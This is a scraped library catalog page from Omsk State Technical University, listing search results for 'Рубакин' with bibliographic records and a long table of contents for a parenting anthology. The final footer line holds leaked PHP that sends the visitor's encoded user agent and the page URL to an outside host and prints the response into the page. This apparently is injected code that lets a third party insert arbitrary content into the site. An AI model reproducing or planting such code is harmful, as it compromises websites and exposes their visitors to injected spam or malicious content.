Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

167 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=РУБАКИН")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 9
1. 
Рубакин, Николай Александрович. Избранное [Текст] : в 2 т. Т. 1 / авт. предисл. Б. А. Смирнова ; дар. Л. А. Ступникова, 1975. - 221, [2] с.
Держатели документа (Информация об экземплярах) 
2. 
Рубакин, Николай Александрович. Избранное [Текст] : в 2 т. Т. 2 / дар. Л. А. Ступникова, 1975. - 280 с.
Держатели документа (Информация об экземплярах) 
3. 
Разгон, Лев Эммануилович. Под шифром "РБ" [Текст] / Л. Э. Разгон, 1966. - 125, [2] с.
4. 
Мудрость воспитания : книга для родителей / сост.: Б. М. Бим-Бад, Э. Д. Днепров, Г. Б. Корнетов, 1989. - 304 с.
Оглавление 
  • Коммунисты изменяют характер общественного воспитания ( К. Маркс, Ф. Энгельс ). - с.6
  • Будущее человечества всецело зависит от воспитания трудящихся ( К. Маркс ). - с.7
  • Всестороннее применение всесторонне развитых способностей ( Ф. Энгельс ). - с.8
  • Учиться коммунизму ( В. И. Ленин ). - с.9
  • "Не должна пропасть ни одна сила, ни одно дарование" ( Н. К. Крупская ). - с.11
  • Полное развитие личности на коллективной основе ( А. В. Луначарский ). - с.12
  • Введение в благородный круг мыслителей ( К. Д. Ушинский ). - с.17
  • Значение теории для практики воспитания ( Г. Спенсер ). - с.19
  • Прежде узнать , потом воспитывать ( К. Д. Ушинский ). - с.22
  • Что могут дать матерям науки о человеке ( Н. В. Шелгунов ). - с.22
  • Педагогическая культура родителей ( В. А. Сухомлинский ). - с.24
  • "Женщина не рождается педагогом..." ( К. Цеткин ). - с.26
  • Никакая книга не заменит собственной живой мысли ( Я. Корчак )
  • Человек и исторически накопленная культура ( А. Н. Леонтьев ). - с.31
  • Когда рождается личность ( Э. В. Ильенков ). - с.33
  • Генетическая программа и черты личности ( Н. П. Дубинин )
  • Последствия изоляции ребенка от общества ( Б. Ф. Поршнев ). - с.37
  • Что определяет степень развития ребенка ( А. В. Луначарский ). - с.39
  • Причины различий между людьми, лежащие в их природном складе ( Ж.-Ж. Руссо ). - с.40
  • Причины различий между людьми, лежащие в их воспитании ( К. А. Гельвеций ). - с.42
  • Роль впечатлений детства в судьбе человека : один из примеров ( С. В. Ковалевская ). - с.45
  • Целая долгая жизнь ( Г. К. Честертон ). - с.46
  • Воспитанием решается участь человека ( В. Г. Белинский ). - с.53
  • Воспитатель ведет за собой на помочах будущие светила ( И. П. Ф. Рихтер ). - с.58
  • Душа мира ( А. П. Платонов ). - с.59
  • Что такое разумная родительская любовь ( Ж.-Ж. Руссо ). - с.61
  • Бескорыстная родительская любовь ( В. Я. Стоюнин ). - с.66
  • Любовь передается по наследству ( Г. Н. волков ). - с.67
  • Детская любовь и сочувствие против жадности и жестокости ( Б. Рассел ). - с.70
  • Соответствие между словом и делом в воспитании ( П. Ф. Лесгафт ). - с.76
  • Сила подражания ( В. П. Вахтеров ). - с.76
  • "Вы воспитываете его в каждый момент вашей жизни" ( А. С. Макаренко ). - с.78
  • Нет прощения, нет оправдания, нет искупления жестокости ( Ф. М. Достоевский ). - с.80
  • Виды родительского авторитета и их воспитательное значение ( А. С. Макаренко ). - с.82
  • Воспитание других включается в воспитание себя ( Л. Н. Толстой ). - с.87
  • "В течение всей жизни" ( А. Сен-Симон ). - с.89
  • О силе привычки ( Ф. Бэкон ). - с.90
  • Темное и скромное происхождение павлуш чичиковых ( Н. в. Гоголь ). - с.91
  • От младенца до подростка ( Л. С. Выготский ). - с.95
  • Стадии развития психики ребенка ( А. Н. Лентьев ). - с.97
  • Уважать и понимать особенности возраста воспитанников! ( П. Ф. Каптерев ). - с.100
  • Воспитание в раннем детстве ( В. М. Бехтерев ). - с.101
  • "Сущность человечности развивается только при наличии покоя" ( И. Г. Песталоцци ). - с.103
  • "Закупоренный кратер вулкана" ( Ш. А. Амонашвили ). - с.105
  • Понимать язык плача и смеха! ( Я. Корчак ). - с.106
  • Первые упражнения для развития внешних чувств ( А. Я. Герд ). - с.108
  • Ведущая деятельность "школьного" возраста - учение ( Д. Б. Эльконин ). - с.109
  • Доверие к детскому уму ( Н. Г. Чернышевский ). - с.110
  • Кризис "школьного" возраста ( Я. Корчак ). - с.111
  • Отрочество и его тревоги ( В. А. Сухомлинский ). - с.113
  • Самосознание подростка ( Ю. П. Азаров ). - с.121
  • Подростки и любовь ( Я. Корчак ). - с.124
  • "Что я считаю началом юности" ( Л. Н. Толстой ). - с.126
  • Слагаемые призвания ( К. А. Гельвеций ). - с.127
  • Юношеская влюбленность ( М. М. Рубинштейн ). - с.129
  • "Сызмальства учить ненавидеть дурное!" ( М. Монтень ). - с.137
  • Истоки нравственности в ребенке ( С. Л. Соловейчик ). - с.138
  • Упражнять детей в нравственности и добродетелях ( Я. А. Коменский ). - с.144
  • Воспитание добродушия ( П. Ф. Лесгафт ). - с.146
  • Учите терпению в страдании, бодрости в несчастии, мужеству в правом деле ( Н. И. Новиков ). - с.149
  • Прочные основы характера ( И. Кант ). - с.151
  • Все это заставляет взрослого быть очень последовательным ( П. Ф. Лесгафт ). - с.155
  • Режим - это только средство ( А. С. Макаренко ). - с.158
  • Воспитание ответственности ( Х. Д. Джайнотт ). - с.162
  • "Источники всего хорошего лежат в игре и исходят из нее" ( Фр. Фребель ). - с.166
  • Игра будит ум и воображение ( Е. А. Аркин ). - с.167
  • Как научить любить прекрасное ( Д. И. Писарев ). - с.171
  • "Прекрасное пробуждает доброе" ( Д. Б. Кабалевский ). - с.174
  • "Пусть они будут муравьями..." ( Я. А. Коменский ). - с.176
  • Облагораживающий труд ( А. С. Макренко ). - с.177
  • Наказание - воспитание или месть? ( Л. Н. Толстой ). - с.180
  • Творческий производительный труд как метод воспитания ( К. Н. Вентцель ). - с.181
  • Азбука гражданского воспитания ( Ю. П. Азаров ). - с.184
  • Откуда у хороших родителей плохие дети? ( Симеон Полоцкий ). - с.189
  • Много пап и мам, но мало отцов и матерей ( В. Г. Белинский ). - с.189
  • Корень воспитательной порчи заключается именно в чадолюбии ( Н. В. Шелгунов ). - с.194
  • Семейная среда и реакция ребенка на нее ( Я. Корчак ). - с.197
  • "Облегченное" воспитание ( Ф. М. Достоевский ). - с.200
  • Авторитароное воспитание ( Н. А. Добролюбов ). - с.201
  • Уберечь от эгоизма ( В. А. Сухомлинский ). - с.205
  • Побои, награды, регламентации ( Д. Локк ). - с.207
  • Не наказывать, не хвалить, а... ( Л. А. Никитина ). - с.211
  • Капризы и упрямство ( Е. А. Аркин ). - с.212
  • Не надо пугать детей ( С. Т. Шацкий ). - с.218
  • Борьба со страхами ( П. Ф. Каптерев ). - с.220
  • Только не притворство, не ложь! ( Н. И. Пирогов ). - с.223
  • О корнях нравственного иждевенчества ( В. А. Сухомлинский ). - с.226
  • Трудные характеристики ( В. П. Кащенко, Г. В. Мурашев ). - с.227
  • Профилактика нервных срывов ( А. Н. Чехова ). - с.232
  • Проблема "вундеркинда" ( А. В. Петровский ). - с.235
  • "Не станем напрасно терять времени..." ( Квинтилиан ). - с.241
  • Крайности раннего обучения ( В. Ф. Одоевский ). - с.243
  • Мыслить смолоду ( Э. В. Ильенков ). - с.245
  • Тренировка мыслительных способностей ( И. Г. Фихте ). - с.248
  • Отличие труда от игры ( И. Кант ). - с.250
  • В игре перед детьми раскрывается мир. - с.251
  • Учитесь спрашивать ( А. И. Герцен ). - с.252
  • Приохочивать, а не приневоливать к учению ( Д. И. Писарев ). - с.253
  • Первейший инструмент развития природных дарований ( Я. А. Коменский ). - с.256
  • Образование - это понимание к жизни ( Дж. Рёскин ). - с.258
  • Что такое образованный, интеллигентный человек ( Н. А. Рубакин ). - с.259
  • "Ленивый ученик?" - Нет, гениальный поэт ( Н. Г. Чернышевский ). - с.263
  • Потребность в книге ( Ш. А. Амонашвили ). - с.264
  • Дать ребенку веру в сои силы ( В. П. Вахтеров ). - с.266
  • "Бездарные" и "бестолковые" ученики ( Н. А. Добролюбов ). - с.267
  • Как помогать детям в учебе ( К. В. Бардин ). - с.270
  • Подтянуть трудного ученика ( В. А. Сухомлинский ). - с.273
  • Овладеть профессией ученика ( Ш. А. Амонашвили ). - с.276
  • Успехи в учении и сила товарищества ( И. П. Иванов ). - с.280
  • Семья и школа : навстречу друг другу ( Л. А. Кассиль ). - с.281
  • В семье Карла Маркса ( П. Лафарг ). - с.285
  • Различия во влиянии матери и отца на их детей ( А. Н. Острогорский ). - с.286
  • Служение семье и служение обществу ( Л. Н. Толстой ). - с.288
  • Семья - школа понимания общества ( А. П. Платонов ). - с.288
  • Семейная жизнь для ребенка то же, что для нас общественная ( А. Н. Острогорский ). - с.290
  • Семейная среда и жизненный путь ребенка ( И. С. Кон ). - с.291
  • В одной семье - два поколения воспитателей (А. В. Петровский ). - с.294
  • Целый огромный мир и я, родитель (С. Л. Соловейчик ). - с.298
  • Попытаемся же воспитать из наших детей новое человечество!" ( М. Горький ). - с.298
Держатели документа (Информация об экземплярах) 
5. 
Яновский-Максимов, Николай Максимович. Сердцу дорогие приметы [Текст] : кн. для учащихся / Ник. Яновский-Максимов, 1972. - 142, [2] с.
6. 
Великие люди - библиотекари: От А до Я [Текст] / Сост. Е. И. Полтавская, 2005. - 158 с.
Держатели документа (Информация об экземплярах) 
7. 
Рубакин, Николай Александрович. Библиологическая психология [Текст] / Н. А. Рубакин, 2006. - 798, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
8. 
Рубакин, Александр Николаевич. Рубакин [Текст] : (лоцман книжного моря) / А. Н. Рубакин, 1967. - 174, [2] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
9. 
Историко-библиографические исследования [Текст] : Сб. науч. трВып. 5 / РНБ, 1995. - 250 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2998 - 25.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.99 с.12 запросов, 0.66c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;